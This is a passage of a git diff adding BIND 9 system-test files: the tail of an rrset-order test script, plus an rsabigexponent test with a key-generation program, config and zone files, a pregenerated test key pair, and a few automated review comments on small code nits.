dig.out.$j >/dev/null && matches=$((matches + 1)) + fi +done +$DIFF dig.out.0 dig.out.1 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.2 dig.out.3 >/dev/null && ret=1 +if [ $matches -ne 16 ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "Checking order random (secondary loaded from disk)" +ret=0 +for i in $GOOD_RANDOM +do + eval match$i=0 +done +for i in a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 9 +do + $DIGCMD @10.53.0.2 random.example > dig.out.random || ret=1 + match=0 + for j in $GOOD_RANDOM + do + eval "$DIFF dig.out.random dig.out.random.good$j >/dev/null && match$j=1 match=1" + if [ $match -eq 1 ]; then break; fi + done + if [ $match -eq 0 ]; then ret=1; fi +done +match=0 +for i in $GOOD_RANDOM +do + eval "match=\$((match + match$i))" +done +echo_i "Random selection return $match of ${GOOD_RANDOM_NO} possible orders in 36 samples" +if [ $match -lt $((GOOD_RANDOM_NO / 3)) ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "Checking order none (secondary loaded from disk)" +ret=0 +# Fetch the "reference" response and ensure it contains the expected records. +$DIGCMD @10.53.0.2 none.example > dig.out.none || ret=1 +for i in 1 2 3 4; do + grep -F -q 1.2.3.$i dig.out.none || ret=1 +done +# Ensure 20 further queries result in the same response as the "reference" one. 
+for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20; do + $DIGCMD @10.53.0.2 none.example > dig.out.test$i || ret=1 + $DIFF dig.out.none dig.out.test$i >/dev/null || ret=1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# +# +# +if $test_fixed; then + echo_i "Checking order fixed (cache)" + ret=0 + for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 + do + $DIGCMD @10.53.0.3 fixed.example > dig.out.fixed || ret=1 + $DIFF dig.out.fixed dig.out.fixed.good || ret=1 + done + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +# +# +# +echo_i "Checking order cyclic (cache + additional)" +ret=0 +# prime acache +$DIGCMD @10.53.0.3 cyclic.example > dig.out.cyclic || ret=1 +matches=0 +for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 +do + j=$((i % 4)) + $DIGCMD @10.53.0.3 cyclic.example > dig.out.cyclic || ret=1 + if [ $i -le 4 ]; then + cp dig.out.cyclic dig.out.$j + else + $DIFF dig.out.cyclic dig.out.$j >/dev/null && matches=$((matches + 1)) + fi +done +$DIFF dig.out.0 dig.out.1 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.2 dig.out.3 >/dev/null && ret=1 +if [ $matches -ne 16 ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# +# +# +echo_i "Checking order cyclic (cache)" +ret=0 +# prime acache +$DIGCMD @10.53.0.3 cyclic2.example > dig.out.cyclic2 || ret=1 +matches=0 +for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 +do + j=$((i % 4)) + $DIGCMD @10.53.0.3 cyclic2.example > dig.out.cyclic2 || ret=1 + if [ $i -le 4 ]; then + cp dig.out.cyclic2 dig.out.$j + else + $DIFF dig.out.cyclic2 dig.out.$j >/dev/null && matches=$((matches + 1)) + fi +done +$DIFF dig.out.0 dig.out.1 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.3 >/dev/null && 
ret=1 +$DIFF dig.out.1 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.2 dig.out.3 >/dev/null && ret=1 +if [ $matches -ne 16 ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "Checking order random (cache)" +ret=0 +for i in $GOOD_RANDOM +do + eval match$i=0 +done +for i in a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 9 +do + $DIGCMD @10.53.0.3 random.example > dig.out.random || ret=1 + match=0 + for j in $GOOD_RANDOM + do + eval "$DIFF dig.out.random dig.out.random.good$j >/dev/null && match$j=1 match=1" + if [ $match -eq 1 ]; then break; fi + done + if [ $match -eq 0 ]; then ret=1; fi +done +match=0 +for i in $GOOD_RANDOM +do + eval "match=\$((match + match$i))" +done +echo_i "Random selection return $match of ${GOOD_RANDOM_NO} possible orders in 36 samples" +if [ $match -lt $((GOOD_RANDOM_NO / 3)) ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "Checking order none (cache)" +ret=0 +# Fetch the "reference" response and ensure it contains the expected records. +$DIGCMD @10.53.0.3 none.example > dig.out.none || ret=1 +for i in 1 2 3 4; do + grep -F -q 1.2.3.$i dig.out.none || ret=1 +done +# Ensure 20 further queries result in the same response as the "reference" one. 
+for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20; do + $DIGCMD @10.53.0.3 none.example > dig.out.test$i || ret=1 + $DIFF dig.out.none dig.out.test$i >/dev/null || ret=1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "Checking default order (cache)" +ret=0 +for i in $GOOD_RANDOM +do + eval match$i=0 +done +for i in a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 9 +do + $DIGCMD @10.53.0.5 random.example > dig.out.random || ret=1 + match=0 + for j in $GOOD_RANDOM + do + eval "$DIFF dig.out.random dig.out.random.good$j >/dev/null && match$j=1 match=1" + if [ $match -eq 1 ]; then break; fi + done + if [ $match -eq 0 ]; then ret=1; fi +done +match=0 +for i in $GOOD_RANDOM +do + eval "match=\$((match + match$i))" +done +echo_i "Default selection return $match of ${GOOD_RANDOM_NO} possible orders in 36 samples" +if [ $match -lt $((GOOD_RANDOM_NO / 3)) ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "Checking default order no match in rrset-order (cache)" +ret=0 +# Fetch the "reference" response and ensure it contains the expected records. +$DIGCMD @10.53.0.4 nomatch.example > dig.out.nomatch || ret=1 +for i in 1 2 3 4; do + grep -F -q 1.2.3.$i dig.out.nomatch || ret=1 +done +# Ensure 20 further queries result in the same response as the "reference" one. +for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20; do + $DIGCMD @10.53.0.4 nomatch.example > dig.out.test$i || ret=1 + $DIFF dig.out.nomatch dig.out.test$i >/dev/null || ret=1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/rsabigexponent/Makefile.in b/bin/tests/system/rsabigexponent/Makefile.in new file mode 100644 index 0000000..550263c --- /dev/null +++ b/bin/tests/system/rsabigexponent/Makefile.in 
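Review bot: The sampling list in each "Checking order random" block and in "Checking default order (cache)" is `a b c … z 0 1 2 3 4 5 6 7 9`, which is 35 iterations because `8` is missing, while the `echo_i` that follows reports "in 36 samples". Either add the missing value so the list ends `… 5 6 7 8 9`, or derive the count from the loop so the message cannot drift from it; the same list is repeated in all five blocks (primary, secondary, secondary loaded from disk, cache, default). Separately, the "order fixed" checks for the secondary and the cache run `$DIFF dig.out.fixed dig.out.fixed.good || ret=1` without the `>/dev/null` used in the primary check, so a mismatch is reported differently depending on which server is queried.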
@@ -0,0 +1,51 @@
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+srcdir = @srcdir@
+VPATH = @srcdir@
+top_srcdir = @top_srcdir@
+
+VERSION=@BIND9_VERSION@
+
+@BIND9_MAKE_INCLUDES@
+
+CINCLUDES = ${DNS_INCLUDES} ${ISC_INCLUDES} \
+ ${OPENSSL_CFLAGS}
+
+CDEFINES =
+CWARNINGS =
+
+DNSLIBS = ../../../../lib/dns/libdns.@A@ @NO_LIBTOOL_DNSLIBS@
+ISCLIBS = ../../../../lib/isc/libisc.@A@ @NO_LIBTOOL_ISCLIBS@
+
+DNSDEPLIBS = ../../../../lib/dns/libdns.@A@
+ISCDEPLIBS = ../../../../lib/isc/libisc.@A@
+
+DEPLIBS = ${DNSDEPLIBS} ${ISCDEPLIBS}
+
+LIBS = ${DNSLIBS} ${ISCLIBS} ${OPENSSL_LIBS} @LIBS@
+
+TARGETS = bigkey@EXEEXT@
+
+OBJS = bigkey.@O@
+
+SRCS = bigkey.c
+
+@BIND9_MAKE_RULES@
+
+all: bigkey@EXEEXT@
+
+bigkey@EXEEXT@: ${OBJS} ${DEPLIBS}
+ ${LIBTOOL_MODE_LINK} ${PURIFY} ${CC} ${CFLAGS} ${LDFLAGS} -o $@ ${OBJS} ${LIBS}
+
+clean distclean::
+ rm -f ${TARGETS}
+
diff --git a/bin/tests/system/rsabigexponent/README.md b/bin/tests/system/rsabigexponent/README.md
new file mode 100644
index 0000000..44afdbd
--- /dev/null
+++ b/bin/tests/system/rsabigexponent/README.md
@@ -0,0 +1,39 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+SPDX-License-Identifier: MPL-2.0
+
+This Source Code Form is subject to the terms of the Mozilla Public
+License, v. 2.0. If a copy of the MPL was not distributed with this
+file, you can obtain one at https://mozilla.org/MPL/2.0/.
+
+See the COPYRIGHT file distributed with this work for additional
+information regarding copyright ownership.
+
+The `rsabigexponent` test is used to `check max-rsa-exponent-size`.
+
+We only run this test on builds without PKCS#11, as we have control over
+the RSA exponent size with plain OpenSSL. We have not explored how to do
+this with PKCS#11, which would require generating such a key and then
+signing a zone with it. Additionally, even with control of the exponent
+size with PKCS#11, generating a DNSKEY with this property and signing
+such a zone would be slow and undesirable for each test run; instead, we
+use a pregenerated DNSKEY and a saved signed zone. These are located in
+`rsabigexponent/ns2` and currently use RSASHA1 for the `DNSKEY`
+algorithm; however, that may need to be changed in the future.
+
+To generate the `DNSKEY` used in this test, we used `bigkey.c`, as
+dnssec-keygen is not capable of generating such keys.
+
+Do **not** remove `bigkey.c` as it may be needed to generate a new
+`DNSKEY` for testing purposes.
+
+`bigkey` is used to both test that we are not running under PKCS#11 and
+generate a `DNSKEY` key with a large RSA exponent.
+
+To regenerate `ns2/example.db.bad` comment out the range test in
+opensslrsa_parse before signing the zone with a ZSK key generated
+by `bigkey`.
+
+ if (BN_num_bits(e) > RSA_MAX_PUBEXP_BITS) {
+ DST_RET(ISC_R_RANGE);
+ }
diff --git a/bin/tests/system/rsabigexponent/bigkey.c b/bin/tests/system/rsabigexponent/bigkey.c
new file mode 100644
index 0000000..ea57b34
--- /dev/null
+++ b/bin/tests/system/rsabigexponent/bigkey.c
@@ -0,0 +1,162 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+
+#include <isc/buffer.h>
+#include <isc/mem.h>
+#include <isc/platform.h>
+#include <isc/print.h>
+#include <isc/region.h>
+#include <isc/stdio.h>
+#include <isc/string.h>
+#include <isc/util.h>
+
+#define DST_KEY_INTERNAL
+
+#include <openssl/bn.h>
+#include <openssl/err.h>
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+#include <openssl/rsa.h>
+
+#include <dns/dnssec.h>
+#include <dns/fixedname.h>
+#include <dns/keyvalues.h>
+#include <dns/log.h>
+#include <dns/name.h>
+#include <dns/rdataclass.h>
+#include <dns/result.h>
+#include <dns/secalg.h>
+
+#include <dst/dst.h>
+#include <dst/result.h>
+
+dst_key_t *key;
+dns_fixedname_t fname;
+dns_name_t *name;
+unsigned int bits = 2048U;
+isc_mem_t *mctx;
+isc_log_t *log_;
+isc_logconfig_t *logconfig;
+int level = ISC_LOG_WARNING;
+isc_logdestination_t destination;
+char filename[255];
+isc_result_t result;
+isc_buffer_t buf;
+RSA *rsa;
+BIGNUM *e;
+EVP_PKEY *pkey;
+
+#define CHECK(op, msg) \
+ do { \
+ result = (op); \
+ if (result != ISC_R_SUCCESS) { \
+ fprintf(stderr, \
+ "fatal error: %s returns %s at file %s line " \
+ "%d\n", \
+ msg, isc_result_totext(result), __FILE__, \
+ __LINE__); \
+ exit(1); \
+ } \
+ } while (0)
+
+int
+main(int argc, char **argv) {
+ UNUSED(argc);
+ UNUSED(argv);
+
+#if !USE_PKCS11
+
+ rsa = RSA_new();
+ e = BN_new();
+ pkey = EVP_PKEY_new();
+
+ if ((rsa == NULL) || (e == NULL) || (pkey == NULL) ||
+ !EVP_PKEY_set1_RSA(pkey, rsa))
+ {
+ fprintf(stderr, "fatal error: basic OpenSSL failure\n");
+ exit(1);
+ }
+
+ /* e = 0x1000000000001 */
+ BN_set_bit(e, 0);
+ BN_set_bit(e, 48);
+
+ if (RSA_generate_key_ex(rsa, bits, e, NULL)) {
+ BN_free(e);
+ RSA_free(rsa);
+ } else {
+ fprintf(stderr,
+ "fatal error: RSA_generate_key_ex() fails "
+ "at file %s line %d\n",
+ __FILE__, __LINE__);
+ exit(1);
+ }
+
+ dns_result_register();
+
+ isc_mem_create(&mctx);
+ CHECK(dst_lib_init(mctx, NULL), "dst_lib_init()");
+ isc_log_create(mctx, &log_, &logconfig);
+ isc_log_setcontext(log_);
+ dns_log_init(log_);
+ dns_log_setcontext(log_);
+ isc_log_settag(logconfig, "bigkey");
+
+ destination.file.stream = stderr;
+ destination.file.name = NULL;
+ destination.file.versions = ISC_LOG_ROLLNEVER;
+ destination.file.maximum_size = 0;
+ isc_log_createchannel(logconfig, "stderr", ISC_LOG_TOFILEDESC, level,
+ &destination,
+ ISC_LOG_PRINTTAG | ISC_LOG_PRINTLEVEL);
+
+ CHECK(isc_log_usechannel(logconfig, "stderr", NULL, NULL), "isc_log_"
+ "usechannel("
+ ")");
+ name = dns_fixedname_initname(&fname);
+ isc_buffer_constinit(&buf, "example.", strlen("example."));
+ isc_buffer_add(&buf, strlen("example."));
+ CHECK(dns_name_fromtext(name, &buf, dns_rootname, 0, NULL), "dns_name_"
+ "fromtext("
+ "\"example."
+ "\")");
+
+ CHECK(dst_key_buildinternal(name, DNS_KEYALG_RSASHA256, bits,
+ DNS_KEYOWNER_ZONE, DNS_KEYPROTO_DNSSEC,
+ dns_rdataclass_in, pkey, mctx, &key),
+ "dst_key_buildinternal(...)");
+
+ CHECK(dst_key_tofile(key, DST_TYPE_PRIVATE | DST_TYPE_PUBLIC, NULL),
+ "dst_key_tofile()");
+ isc_buffer_init(&buf, filename, sizeof(filename) - 1);
+ isc_buffer_clear(&buf);
+ CHECK(dst_key_buildfilename(key, 0, NULL, &buf), "dst_key_"
+ "buildfilename()");
+ printf("%s\n", filename);
+ dst_key_free(&key);
+
+ isc_log_destroy(&log_);
+ isc_log_setcontext(NULL);
+ dns_log_setcontext(NULL);
+ dst_lib_destroy();
+ isc_mem_destroy(&mctx);
+ return (0);
+#else /* !USE_PKCS11 */
+ return (1);
+#endif /* !USE_PKC11 */
+}
+
+/*! \file */
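Review bot: The return values of the two `BN_set_bit()` calls in `main` are ignored, so if either fails the exponent is not 2^48+1 and `RSA_generate_key_ex()` is still attempted with whatever `e` holds. A key without the oversized exponent would quietly make the `max-rsa-exponent-size` test meaningless instead of failing loudly. Checking them like the other OpenSSL calls closes that gap: `if (!BN_set_bit(e, 0) || !BN_set_bit(e, 48)) { fprintf(stderr, "fatal error: BN_set_bit() fails\n"); exit(1); }`. Separately, the closing `#endif` comment reads `!USE_PKC11` and should read `!USE_PKCS11`.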
diff --git a/bin/tests/system/rsabigexponent/clean.sh b/bin/tests/system/rsabigexponent/clean.sh
new file mode 100644
index 0000000..22ea41a
--- /dev/null
+++ b/bin/tests/system/rsabigexponent/clean.sh
@@ -0,0 +1,23 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f K* */K* */dsset-*. */*.signed */trusted.conf */tmp*
+rm -f ns*/dsset-example
+rm -f ns*/named.run
+rm -f ns*/named.memstats
+rm -f ns1/root.db
+rm -f ns2/signer.err
+rm -f dig.out.*
+rm -f ns*/named.lock
+rm -f ns*/named.conf
+rm -f ns*/managed-keys.bind*
diff --git a/bin/tests/system/rsabigexponent/conf/bad01.conf b/bin/tests/system/rsabigexponent/conf/bad01.conf
new file mode 100644
index 0000000..720d197
--- /dev/null
+++ b/bin/tests/system/rsabigexponent/conf/bad01.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ max-rsa-exponent-size 1;
+};
diff --git a/bin/tests/system/rsabigexponent/conf/bad02.conf b/bin/tests/system/rsabigexponent/conf/bad02.conf
new file mode 100644
index 0000000..bd1e827
--- /dev/null
+++ b/bin/tests/system/rsabigexponent/conf/bad02.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ max-rsa-exponent-size 34;
+};
diff --git a/bin/tests/system/rsabigexponent/conf/bad03.conf b/bin/tests/system/rsabigexponent/conf/bad03.conf
new file mode 100644
index 0000000..4331b52
--- /dev/null
+++ b/bin/tests/system/rsabigexponent/conf/bad03.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ max-rsa-exponent-size 4097;
+};
diff --git a/bin/tests/system/rsabigexponent/conf/good01.conf b/bin/tests/system/rsabigexponent/conf/good01.conf
new file mode 100644
index 0000000..1d2cd01
--- /dev/null
+++ b/bin/tests/system/rsabigexponent/conf/good01.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ max-rsa-exponent-size 0;
+};
diff --git a/bin/tests/system/rsabigexponent/conf/good02.conf b/bin/tests/system/rsabigexponent/conf/good02.conf
new file mode 100644
index 0000000..861e054
--- /dev/null
+++ b/bin/tests/system/rsabigexponent/conf/good02.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ max-rsa-exponent-size 35;
+};
diff --git a/bin/tests/system/rsabigexponent/conf/good03.conf b/bin/tests/system/rsabigexponent/conf/good03.conf
new file mode 100644
index 0000000..14a98f8
--- /dev/null
+++ b/bin/tests/system/rsabigexponent/conf/good03.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ max-rsa-exponent-size 4096;
+};
diff --git a/bin/tests/system/rsabigexponent/ns1/named.conf.in b/bin/tests/system/rsabigexponent/ns1/named.conf.in
new file mode 100644
index 0000000..4a9822d
--- /dev/null
+++ b/bin/tests/system/rsabigexponent/ns1/named.conf.in
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS1
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ dnssec-validation yes;
+};
+
+zone "." {
+ type primary;
+ file "root.db.signed";
+};
+
+include "trusted.conf";
diff --git a/bin/tests/system/rsabigexponent/ns1/root.db.in b/bin/tests/system/rsabigexponent/ns1/root.db.in
new file mode 100644
index 0000000..0486325
--- /dev/null
+++ b/bin/tests/system/rsabigexponent/ns1/root.db.in
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+. IN SOA gson.nominum.com. a.root.servers.nil. (
+ 2012050600 ; serial
+ 3600 ; refresh
+ 1200 ; retry
+ 604800 ; expire
+ 60 ; minimum
+ )
+@ NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+;
+example. NS ns2.example.
+ns2.example. A 10.53.0.2
diff --git a/bin/tests/system/rsabigexponent/ns1/sign.sh b/bin/tests/system/rsabigexponent/ns1/sign.sh
new file mode 100755
index 0000000..d045fe2
--- /dev/null
+++ b/bin/tests/system/rsabigexponent/ns1/sign.sh
@@ -0,0 +1,34 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+zone=.
+infile=root.db.in
+zonefile=root.db
+
+cp ../ns2/dsset-example.in dsset-example$TP
+
+keyname=`$KEYGEN -q -a RSASHA256 -b 2048 -n zone $zone`
+
+cat $infile $keyname.key > $zonefile
+
+$SIGNER -P -g -o $zone $zonefile > /dev/null
+
+# Configure the resolving server with a static key.
+keyfile_to_static_ds $keyname > trusted.conf
+cp trusted.conf ../ns2/trusted.conf
+cp trusted.conf ../ns3/trusted.conf
+
+cd ../ns2 && $SHELL -e ./sign.sh
diff --git a/bin/tests/system/rsabigexponent/ns2/Xexample.+008+51650.key b/bin/tests/system/rsabigexponent/ns2/Xexample.+008+51650.key
new file mode 100644
index 0000000..60ff187
--- /dev/null
+++ b/bin/tests/system/rsabigexponent/ns2/Xexample.+008+51650.key
@@ -0,0 +1,5 @@
+; This is a key-signing key, keyid 51650, for example.
+; Created: 20220721024334 (Thu Jul 21 12:43:34 2022)
+; Publish: 20220721024334 (Thu Jul 21 12:43:34 2022)
+; Activate: 20220721024334 (Thu Jul 21 12:43:34 2022)
+example. IN DNSKEY 257 3 8 AwEAAeeXAGBcXxSNj5X/PWT8XDBk4U9OUkZ7YKQBf2IN3V6OZomt/s3F UWIh70Wot+z1Ld3Rfswq1DjCaWNRFOMhs+9j3Fhc46wMZ4pnsDW1nLHk 2TnQRdrbiuhLkQy5oNMjSRxu924XLw5ylsuqjxE7vXcCeKSFe674roSq wo39atWsTJMDz0FQGxlPucnXai0nHoCeC7+u1s+wLaGcpNSZlsab7Zny FD4HZ3HKUCJw/Jjr5CZjqal9KdmWSC1SINRtlAN6PX5VSiNEncnYMCdj iv+ZhRGn+aHh1BmEWomGbAm2Jjw5mrYMgDs9lJRc5Vtg0YXb9OkYvxNF V4QGw1oeF+M=
diff --git a/bin/tests/system/rsabigexponent/ns2/Xexample.+008+51650.private b/bin/tests/system/rsabigexponent/ns2/Xexample.+008+51650.private new file mode 100644 index 0000000..d38a0b3 --- /dev/null +++ b/bin/tests/system/rsabigexponent/ns2/Xexample.+008+51650.private 
@@ -0,0 +1,13 @@ +Private-key-format: v1.3 +Algorithm: 8 (RSASHA256) +Modulus: 55cAYFxfFI2Plf89ZPxcMGThT05SRntgpAF/Yg3dXo5mia3+zcVRYiHvRai37PUt3dF+zCrUOMJpY1EU4yGz72PcWFzjrAxnimewNbWcseTZOdBF2tuK6EuRDLmg0yNJHG73bhcvDnKWy6qPETu9dwJ4pIV7rviuhKrCjf1q1axMkwPPQVAbGU+5yddqLScegJ4Lv67Wz7AtoZyk1JmWxpvtmfIUPgdnccpQInD8mOvkJmOpqX0p2ZZILVIg1G2UA3o9flVKI0SdydgwJ2OK/5mFEaf5oeHUGYRaiYZsCbYmPDmatgyAOz2UlFzlW2DRhdv06Ri/E0VXhAbDWh4X4w== +PublicExponent: AQAB +PrivateExponent: QaMgBa+YeRxIElS1g14tCMBGxXHmyrgkI0eTYWiZkbedYy8v1QU0NDJ2/NC9VEkHF2PNYrNO08lyEiaEW32NYG92n4qwMm6PmAAcRpSzFQ5N7N9VNRrdK0pjkW45IS5Shd8DfK3QdfFPQOkVxGYgpE7Mf6Cfde9gkxRMsO6erXEud6KyBm8kwBR/ipDeUQvpyGkZEQPjLxJG6REjMVhPKTzCV+82DWEf+Ok/3Uxa94+ocAbySHAV3j4YcWpVGWT002gc6CGk8c6TsPYnDkfKQ3moPQZijH7F8zrARtoobCX9TsMFhBqReceZrbzN7en2cZGR5MSISzoTNSr4rGo6aQ== +Prime1: 8AV9EllWtclD62XHo95Z3h7JJ9t2gY7fUFG0WMbkI0Wj6kcr7k3bFfLj7GEJ1qgVW4Qpu7XnBvPB9hnqoCkbHLzc8ws1D2tY+PsXzvw9IxoXNM/eCobeulu/rYhJl2PcpY9bPcaaR0hldGoCHdFYSo8oi+C5hfRtIMVjnDtHSmk= +Prime2: 9wHRxgyHjtl8ro9HAkvujxFkhChm4xLxIRM8pfZ+D1VHpzFRD3/RK8CVYVRB8GsQoFRygHBMOW1oHqynN9jddvJrQbHOqFZAbQQlesp0jRPd9Mm6q0cDwYcD4apscB2CUrUswMzoD3H4saIjGnitCsG/t+sLTvuK/giuMdS2Tms= +Exponent1: pnSH+pOuiL+dtMCPJVvsoxhilJukodD9mewv0GmOic+gD7dwBgJEcAJUgvgBJLbIqQENGDrcj3u5Bf2PM6eOP+3SpVMeZyUhPPqV1lwj4hYUBfIqoM5L5J4AXk5oCu+cc8zpj/wNvmW8xnFGKnumaX7Ctc8Rmo6ap+F8ZTrPBBE= +Exponent2: txXZKIRnAkJAwZ6f0pr3w4Hv0GmmAZArvQlmPdncDH94sfvDCssB/v0rfE4Y5hxl4YFWsc8LINHwiDQPajzLwvvi9nnWJT5xWJznLwHbrCparbPNMmFb7lmmTeGlqOCmlamG942qQLCI1xnIDTn/gWalNaz539xhZPSIMZVqX+s= +Coefficient: 